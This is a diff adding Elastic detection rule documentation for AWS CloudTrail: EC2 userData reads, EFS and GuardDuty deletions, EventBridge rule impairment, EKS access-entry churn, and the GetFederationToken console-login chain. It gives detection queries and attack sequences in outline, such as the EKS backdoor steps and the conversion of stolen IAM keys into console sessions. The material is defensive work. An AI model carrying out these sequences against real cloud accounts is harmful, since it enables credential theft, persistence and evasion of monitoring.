b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc new file mode 100644 index 0000000000..de6b3e8ba7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance]] +=== AWS EC2 User Data Retrieval for EC2 Instance + +Identifies discovery request DescribeInstanceAttribute with the attribute userData and instanceId in AWS CloudTrail logs. This may indicate an attempt to retrieve user data from an EC2 instance. Adversaries may use this information to gather sensitive data from the instance such as hardcoded credentials or to identify potential vulnerabilities. This is a New Terms rule that identifies the first time an IAM user or role requests the user data for a specific EC2 instance. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstanceAttribute.html +* https://hackingthe.cloud/aws/exploitation/local_ec2_priv_esc_through_user_data + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 +* Tactic: Discovery +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 10 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating AWS EC2 User Data Retrieval for EC2 Instance* + + +This rule detects requests to retrieve the `userData` attribute of an EC2 instance using the `DescribeInstanceAttribute` API action. The `userData` field can contain sensitive information, such as hardcoded credentials or configuration scripts, that adversaries may exploit for further attacks. + + +*Possible Investigation Steps* + + +- **Identify the Target Instance**: + - **Instance ID**: Review the `aws.cloudtrail.flattened.request_parameters.instanceId` field to identify the EC2 instance targeted by the request. Confirm whether this instance should expose its `userData` and whether it is associated with sensitive workloads. + - **Analyze userData**: If possible, retrieve and inspect the `userData` field to identify sensitive information like hardcoded credentials or configuration scripts. + +- **Review User Context**: + - **User Identity**: Inspect the `aws.cloudtrail.user_identity.arn` field to identify the user or role that executed the `DescribeInstanceAttribute` action. Investigate whether this user typically performs such actions. + - **Access Patterns**: Validate whether the user or role has the necessary permissions and whether the frequency of this action aligns with expected behavior. + - **Access Key ID**: Check the `aws.cloudtrail.user_identity.access_key_id` field to determine the key used to make the request as it may be compromised. + - **Source IP and Geolocation**: Check the `source.address` and `source.geo` fields to validate whether the request originated from a trusted location or network. Unexpected geolocations can indicate adversarial activity. + - **User Agent**: Inspect the `user_agent.original` field to determine the tool or client used (e.g., Terraform, AWS CLI). Legitimate automation tools may trigger this activity, but custom or unknown user agents may indicate malicious intent. + +- **Check for Related Activity**: + - **IAM Changes**: Correlate this event with any IAM changes or temporary credential creation to identify potential privilege escalation attempts. + - **API Usage**: Look for other unusual API calls (e.g., `RunInstances`, `GetObject`, `AssumeRole`) by the same user or IP to detect lateral movement or data exfiltration attempts. + +- **Validate Intent**: + - **Permissions and Justification**: Ensure that the user has the least privilege required to perform this action. Investigate whether there is a valid reason for accessing the `userData` field. + + +*False Positive Analysis* + + +- **Automation**: This event is often triggered by legitimate automation tools, such as Terraform or custom scripts, that require access to `userData` during instance initialization. +- **Maintenance Activity**: Verify whether this event aligns with expected administrative activities, such as debugging or instance configuration updates. + + +*Response and Remediation* + + +- **Revoke Excessive Permissions**: If unauthorized, immediately remove `DescribeInstanceAttribute` permissions from the user or role. +- **Quarantine the Target Instance**: If malicious behavior is confirmed, isolate the affected EC2 instance to limit further exposure. +- **Secure User Data**: + - Avoid storing sensitive information, such as credentials, in `userData`. Use AWS Secrets Manager or Parameter Store instead. + - Encrypt user data and ensure only authorized users can decrypt it. +- **Audit IAM Policies**: Regularly review IAM policies to ensure they adhere to the principle of least privilege. +- **Monitor and Detect**: Set up additional alerts for unexpected `DescribeInstanceAttribute` calls or other suspicious API activity. + + +*Additional Information* + + +For more details on managing EC2 user data securely, refer to the https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html[AWS EC2 User Data Documentation]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "ec2.amazonaws.com" + and event.action: "DescribeInstanceAttribute" + and event.outcome: "success" + and aws.cloudtrail.flattened.request_parameters.attribute: "userData" + and not aws.cloudtrail.user_identity.invoked_by: ( + "AWS Internal" or + "cloudformation.amazonaws.com" or + "aidevops.amazonaws.com" or + "elasticmapreduce.amazonaws.com" or + "aiops.amazonaws.com" + ) + and not user_agent.original: (*Terraform*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Infrastructure Discovery +** ID: T1580 +** Reference URL: https://attack.mitre.org/techniques/T1580/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-efs-file-system-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-efs-file-system-deleted.asciidoc new file mode 100644 index 0000000000..660eae064f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-efs-file-system-deleted.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-32-aws-efs-file-system-deleted]] +=== AWS EFS File System Deleted + +Identifies the deletion of an Amazon EFS file system using the "DeleteFileSystem" API operation. Deleting an EFS file system permanently removes all stored data and cannot be reversed. This action is rare in most environments and typically limited to controlled teardown workflows. Adversaries with sufficient permissions may delete a file system to destroy evidence, disrupt workloads, or impede recovery efforts. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html +* https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EFS +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Austin Songer +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EFS File System Deleted* + + +Amazon Elastic File System (EFS) provides scalable, shared file storage used by EC2, container workloads, analytics jobs, and other persistent applications. Deleting an EFS file system (`DeleteFileSystem`) permanently removes all stored data and cannot be recovered. Mount targets must already be deleted, but those operations are common and do not themselves indicate malicious behavior. This rule focuses exclusively on the irreversible destructive event, which may signal intentional data destruction, ransomware preparation, or a post-compromise cleanup effort. + + +*Possible investigation steps* + + +- **Identify the actor and calling context** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`. + - Check `source.ip`, `user_agent.original`, and whether the call originated via console, IAM role, STS session, or long-lived IAM key. + - Verify whether this principal typically manages EFS resources or teardown activities. + +- **Determine what was deleted** + - Inspect `aws.cloudtrail.request_parameters` to identify the deleted file system ID. + - Map the resource to: + - Application or owner team + - Environment classification (prod / dev / test) + - Dependency surfaces (EC2 instances, ECS tasks, Lambda, analytics pipelines) + +- **Reconstruct timeline and intent** + - Use `@timestamp` to correlate with: + - Recent `UpdateFileSystem` events (e.g., deletion protection, lifecycle policies) + - IAM policy or trust policy changes + - EC2 or container runtime disruption shortly before deletion + - Unexpected regional activity or off-hours execution + - Determine if mount target deletions occurred immediately beforehand (expected lifecycle) or unexpectedly earlier (possibly suspicious when paired with other anomalies). + +- **Correlate with broader account activity** + - Pivot in CloudTrail on: + - The same access key or session + - The same EFS file system ID + - Look for: + - Privilege escalation (new policy attachments, role assumptions) + - Lateral movement (SSM sessions, unusual EC2 access) + - Signs of cleanup or anti-forensics (CloudWatch log group deletions, RDS snapshot deletions) + - Network isolation actions (security-group or NACL updates) + +- **Validate with owners** + - Confirm with application or infrastructure teams: + - Whether the deletion was planned, approved, or part of an environment teardown + - Whether a migration or infrastructure rotation is in progress + - Whether the deleted file system contained production or sensitive workloads + + +*False positive analysis* + + +- **Expected teardown activity** + - Some pipelines (Terraform, CloudFormation, CDK, custom IaC) delete file systems as part of environment rotation or decommissioning. + - Add exceptions for known automation roles or environment tags (e.g., `Environment=Dev`). + +- **Ephemeral test environments** + - Development, QA, or integration test accounts may routinely create and destroy EFS file systems. + - Suppress events for non-production accounts where destructive operations are normal. + +- **Automated housekeeping** + - Internal tooling or lifecycle processes may remove unused EFS resources. + - Identify automation roles and use exceptions based on `aws.cloudtrail.user_identity.arn` or `user_agent.original`. + + +*Response and remediation* + + +- **Contain and secure** + - If unauthorized, revoke or disable the credentials used for the deletion. + - Review CloudTrail for additional destructive or privilege-escalating operations from the same actor. + - Validate whether any associated compute workloads (EC2, ECS, Lambda) show compromise indicators. + +- **Assess impact** + - Identify workloads impacted by the file system deletion. + - Determine whether alternate backups exist (EFS-to-EFS Backup, AWS Backup vaults). + - Evaluate operational disruption and data-loss implications, especially for compliance-bound data. + +- **Recover (if possible)** + - Restore from AWS Backup if a protected resource existed. + - Rebuild infrastructure dependencies that relied on the deleted file system. + +- **Hardening and prevention** + - Restrict use of `elasticfilesystem:DeleteFileSystem` to tightly controlled IAM roles. + - Use IAM conditions (e.g., `aws:PrincipalArn`, `aws:SourceIp`, `aws:RequestedRegion`) to limit destructive operations. + - Ensure AWS Backup policies include EFS resources with sufficient retention. + - Use AWS Config or Security Hub controls to detect: + - EFS file systems without backup plans + - Unexpected changes to file system policies + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **Security Best Practices:** https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "elasticfilesystem.amazonaws.com" + and event.action: "DeleteFileSystem" + and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc new file mode 100644 index 0000000000..b4b0dd1dab --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity]] +=== AWS EKS Access Entry Created Then Deleted by Same Identity + +Detects the creation of an Amazon EKS access entry followed by its deletion by the same identity within a short time window. EKS access entries define Kubernetes RBAC-level permissions for IAM principals in an EKS cluster. An adversary with EKS administrative access may temporarily grant themselves cluster access, use those permissions to create Kubernetes RBAC resources (ClusterRoleBindings, ServiceAccounts with privileged roles), and then delete the access entry to hide the evidence of the initial grant while retaining access through the Kubernetes-level backdoor. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/eks/latest/APIReference/API_CreateAccessEntry.html +* https://docs.aws.amazon.com/eks/latest/APIReference/API_DeleteAccessEntry.html +* https://www.wiz.io/blog/new-attack-vectors-emerge-via-recent-eks-access-entries-and-pod-identity-features +* https://securitylabs.datadoghq.com/articles/eks-cluster-access-management-deep-dive/ + +*Tags*: + +* Domain: Cloud +* Domain: Kubernetes +* Platform: AWS +* Platform: Kubernetes +* Data Source: AWS CloudTrail +* Service: AWS EKS +* Rule Type: Event Correlation (EQL) +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EKS Access Entry Created Then Deleted by Same Identity* + + +EKS access entries (introduced in EKS API mode) map IAM principals to Kubernetes access policies or allow associating Kubernetes groups to IAM principals. An adversary who obtains `eks:CreateAccessEntry` and `eks:DeleteAccessEntry` permissions can: + +1. Create an access entry for their own IAM principal with cluster-admin level access. +2. Use that access to create persistent Kubernetes RBAC resources (ClusterRoleBindings, privileged ServiceAccounts, rogue DaemonSets). +3. Delete the access entry, removing the CloudTrail evidence of the initial grant while retaining Kubernetes-level access. + +This sequence is analogous to adding a backdoor user, using it, then deleting it to cover tracks. The deletion within a short window of creation is the key behavioral indicator. + + +*Possible investigation steps* + + +- Identify the calling identity from `aws.cloudtrail.user_identity.arn` and the targeted cluster from `aws.cloudtrail.request_parameters`. +- Review Kubernetes audit logs for the affected cluster in the time window between the `CreateAccessEntry` and `DeleteAccessEntry` events. Look for `create` verbs on ClusterRoleBindings, RoleBindings, ServiceAccounts, or DaemonSets. +- Check the cluster's current RBAC configuration for persistent backdoor resources. +- Determine whether the identity had a legitimate reason to create an access entry for the targeted cluster. + + +*False positive analysis* + + +- Infrastructure-as-code and CI/CD pipelines that create and tear down EKS access entries as part of cluster validation — Terraform or eksctl apply/destroy cycles, ephemeral test clusters — will produce this exact sequence. Correlate with the pipeline identity and change records before triaging further. +- Short-lived break-glass or just-in-time administrative access that is granted and revoked by the same operator within minutes is legitimate; confirm against access-request tickets or change approvals. +- Migration tooling that switches clusters between authentication modes may churn access entries in bulk under a single automation role. +- The sequence correlates on the calling identity only, so confirm the `CreateAccessEntry` and `DeleteAccessEntry` events reference the same cluster and principal ARN in the request parameters before treating them as one grant-and-revoke cycle. +- Scope any exceptions by the calling ARN or automation role rather than excluding the behavior globally. + + +*Response and remediation* + + +- Audit all Kubernetes RBAC resources for unauthorized ClusterRoleBindings or privileged ServiceAccounts created in the suspect window. +- Rotate credentials for the calling identity. +- Apply IAM policies restricting `eks:CreateAccessEntry` and `eks:DeleteAccessEntry` to designated EKS administrative roles. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. EKS management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by aws.cloudtrail.user_identity.arn with maxspan=5m + [any where data_stream.dataset == "aws.cloudtrail" and event.provider == "eks.amazonaws.com" and event.action == "CreateAccessEntry" and event.outcome == "success" and aws.cloudtrail.user_identity.arn != null] + [any where data_stream.dataset == "aws.cloudtrail" and event.provider == "eks.amazonaws.com" and event.action == "DeleteAccessEntry" and event.outcome == "success" and aws.cloudtrail.user_identity.arn != null] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Container Cluster Roles +** ID: T1098.006 +** Reference URL: https://attack.mitre.org/techniques/T1098/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted.asciidoc new file mode 100644 index 0000000000..e5df6c8297 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted.asciidoc @@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted]] +=== AWS EventBridge Rule Disabled or Deleted + +Identifies when an Amazon EventBridge rule is disabled or deleted. EventBridge rules are commonly used to automate operational workflows and security-relevant routing (for example, forwarding events to Lambda, SNS/SQS, or security tooling). Disabling or deleting a rule can break critical integrations, suppress detections, and reduce visibility. Adversaries may intentionally impair EventBridge rules to disrupt monitoring, delay response, or hide follow-on actions. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DeleteRule.html +* https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DisableRule.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EventBridge +* Tactic: Impact +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 214 + +*Rule authors*: + +* Austin Songer +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS EventBridge Rule Disabled or Deleted* + + +EventBridge rules define when events are matched and where they are delivered. Disabling or deleting a rule can interrupt +automation, break alerting pipelines, and create blind spots in detection coverage. In security-focused designs, EventBridge +is frequently used to forward CloudTrail findings, Config/Security Hub events, GuardDuty findings, or application security +signals to downstream responders. + +This rule detects successful `DisableRule` or `DeleteRule` actions. Depending on what the affected rule does, this activity +may indicate routine operational work or deliberate impairment of monitoring and response paths. + + +*Possible investigation steps* + + +**Identify the actor and access path** +- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which principal performed the change. +- Review `user.name`, `user_agent.original`, and `source.ip` to understand how the action was performed (console vs CLI/SDK/automation) and from where. + +**Confirm what changed and what it impacts** +- Use `aws.cloudtrail.request_parameters` to identify the rule name/ARN and whether the action was `DisableRule` or `DeleteRule`. +- Determine what the rule was used for and assess blast radius: + - Was the rule on a shared event bus or a critical account/region? + - Was it a centralized “security routing” rule that aggregates events from many accounts? + +**Reconstruct timing and sequence** +- Correlate `@timestamp` with surrounding CloudTrail activity for the same actor and the same rule name/ARN. +- Look for companion actions that often occur with impairment attempts: + - IAM changes that expand permissions (`PutRolePolicy`, `AttachRolePolicy`, `UpdateAssumeRolePolicy`, access key creation). + - Changes that disable other telemetry or controls (CloudTrail changes, Config recorder stopped, GuardDuty/Security Hub changes). + - Follow-on actions against sensitive services immediately after the rule was disabled/deleted. + +**Validate authorization and change management** +- Check whether the change aligns with a known deployment, infrastructure-as-code run, or approved change ticket. Confirm with the owning team whether the rule was intentionally disabled/deleted and whether there is a documented replacement. + + +*False positive analysis* + + +- **Planned maintenance and refactoring** + - Rules may be removed during redesign of event patterns, target migrations, or application decommissioning. +- **Infrastructure-as-code or automation** + - CI/CD pipelines and IaC (Terraform/CloudFormation/CDK) can disable/delete rules during drift correction or environment rotation. + + +*Response and remediation* + + +**Restore visibility and business function** +- If the rule is security- or business-critical, restore functionality immediately: + - Re-enable the rule if it was disabled. + - If deleted, recreate it from the last known-good baseline (IaC state, templates, or documented configuration). +- Validate delivery by confirming new matching events reach intended targets (for example, downstream Lambda/SNS/SQS) and that monitoring pipelines resume. + +**Contain potential compromise** +- If the actor is unexpected or the access path is suspicious: + - Restrict the principal’s permissions to EventBridge and related services while you investigate (least-privilege containment). + - Rotate/disable credentials associated with `aws.cloudtrail.user_identity.access_key_id` when applicable. + - For assumed roles, investigate the originating principal and consider temporarily limiting role assumption via IAM conditions or trust policy changes. + +**Scope the incident** +- Pivot in CloudTrail using the same `aws.cloudtrail.user_identity.arn`, access key, and `source.ip` to identify additional EventBridge rule modifications, changes to event buses, permissions, or resource policies that could enable unauthorized routing. +- Determine whether the rule impairment created a monitoring gap and identify the time window of reduced visibility for retrospective review. + +**Hardening and prevention** +- Reduce the likelihood of silent impairment: + - Restrict `events:DisableRule` and `events:DeleteRule` to a small set of administrative roles; use IAM conditions (for example, `aws:PrincipalArn`, `aws:RequestedRegion`, source VPC/IP conditions where appropriate). + - Consider AWS Organizations SCP guardrails in production accounts to limit destructive EventBridge changes. + + +*Additional information* + +- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]** +- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]** +- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]** + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: aws.cloudtrail + and event.provider: events.amazonaws.com + and event.action: (DeleteRule or DisableRule) + and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc new file mode 100644 index 0000000000..031fc6f6fd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc @@ -0,0 +1,119 @@ +[[prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange]] +=== AWS GetFederationToken Followed by Console Login via Federation Exchange + +Detects the three-event chain produced by tools like aws_consoler that convert exfiltrated long-term IAM access keys into browser-accessible AWS console sessions: GetFederationToken obtains temporary credentials, GetSigninToken exchanges them for a federation sign-in token via the AWS federation endpoint, and ConsoleLogin confirms the resulting console session was opened — all from the same source IP within two minutes. This sequence is a high-confidence indicator of credential abuse using stolen IAM access keys. + +*Rule type*: eql + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html +* https://github.com/NetSPI/aws_consoler +* https://www.netspi.com/blog/technical-blog/cloud-pentesting/gaining-aws-console-access-via-api-keys/ +* https://securitylabs.datadoghq.com/cloud-security-atlas/attacks/accessing-the-aws-console-with-getfederationtoken/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS CloudTrail +* Service: AWS STS +* Service: AWS Sign-In +* Rule Type: Event Correlation (EQL) +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GetFederationToken Followed by Console Login via Federation Exchange* + + +This rule detects the aws_consoler attack chain: an adversary exfiltrates a long-term IAM access key (AKIA* prefix), runs aws_consoler or equivalent tooling, which calls `GetFederationToken` to obtain temporary credentials and then exchanges them at the AWS federation endpoint (`https://signin.amazonaws.com/federation`) for a signed console URL. Opening that URL triggers a `ConsoleLogin` event from the same source IP, completing the sequence. + +The source IP correlation distinguishes this pattern from coincidental federation activity: both the API call and the browser-based console login originate from the same attacker machine in automated tooling scenarios. + + +*Possible investigation steps* + + +- Identify the IAM user from `aws.cloudtrail.user_identity.arn` in the first event and confirm whether this user and access key are expected to call `GetFederationToken`. +- Review `source.ip` against known infrastructure. A call from an unexpected geography or cloud provider IP range is a strong indicator of exfiltrated key abuse. +- Query CloudTrail for all API calls made during the resulting console session (user identity type `FederatedUser`) in the window following the `ConsoleLogin`. +- Check GitHub, GitLab, CI/CD pipelines, and `.env` files for exposure of the access key. +- Determine whether any sensitive resources were accessed or modified during the console session. + + +*Response and remediation* + + +- Immediately deactivate the long-term access key used in the `GetFederationToken` call. +- Revoke all active sessions for the IAM user. +- Review all actions taken during the federated console session and assess blast radius. +- Rotate all credentials associated with the IAM user. +- Migrate any legitimate federation use cases to IAM Identity Center or AssumeRoleWithWebIdentity. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. STS and sign-in management events are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by source.ip with maxspan=2m + [any where event.provider == "sts.amazonaws.com" + and event.action == "GetFederationToken" + and event.outcome == "success"] + [any where event.provider == "signin.amazonaws.com" + and event.action == "GetSigninToken" + and event.outcome == "success"] + [any where event.provider == "signin.amazonaws.com" + and event.action == "ConsoleLogin" + and event.outcome == "success"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Forge Web Credentials +** ID: T1606 +** Reference URL: https://attack.mitre.org/techniques/T1606/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-detector-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-detector-deletion.asciidoc new file mode 100644 index 0000000000..8b73416a3a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-detector-deletion.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-32-aws-guardduty-detector-deletion]] +=== AWS GuardDuty Detector Deletion + +Detects the deletion of an Amazon GuardDuty detector. GuardDuty provides continuous monitoring for malicious or unauthorized activity across AWS accounts. Deleting the detector disables this visibility, stopping all threat detection and removing existing findings. Adversaries may delete GuardDuty detectors to impair security monitoring and evade detection during or after an intrusion. This rule identifies successful "DeleteDetector" API calls and can indicate a deliberate defense evasion attempt. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS GuardDuty +* Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide + +*Version*: 213 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS GuardDuty Detector Deletion* + + +Amazon GuardDuty is a continuous threat detection service that analyzes CloudTrail, DNS, and VPC Flow Logs to identify malicious activity and compromised resources. Deleting a GuardDuty detector stops this monitoring entirely and permanently removes all historical findings for the affected AWS account. This rule detects successful `DeleteDetector` API calls, which may represent an attacker attempting to impair defenses and evade detection. Such actions should be rare and always performed under controlled administrative change processes. + + +*Possible investigation steps* + + +- **Identify the actor** + - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type` to determine who initiated the deletion. + - Verify whether this principal normally performs GuardDuty configuration or administrative tasks. + +- **Review request context** + - Check `aws.cloudtrail.request_parameters` and `cloud.region` to confirm the targeted GuardDuty detector and scope of impact. + - Determine whether multiple detectors or member accounts were affected (especially in delegated admin organizations). + +- **Analyze source and access patterns** + - Review `source.ip`, `user_agent.original` and `source.geo` fields for anomalous or previously unseen access locations or automation clients. + - Check whether the deletion occurred outside standard maintenance windows or during a concurrent suspicious activity window. + +- **Correlate with preceding or related activity** + - Search for earlier GuardDuty configuration changes: + - `StopMonitoringMembers`, `DisassociateMembers`, or `DeleteMembers` + - IAM role or policy modifications reducing GuardDuty privileges + - Look for other defense evasion indicators such as CloudTrail suspension, Security Hub configuration changes, or disabling of AWS Config rules. + +- **Review historical GuardDuty findings** + - Examine prior 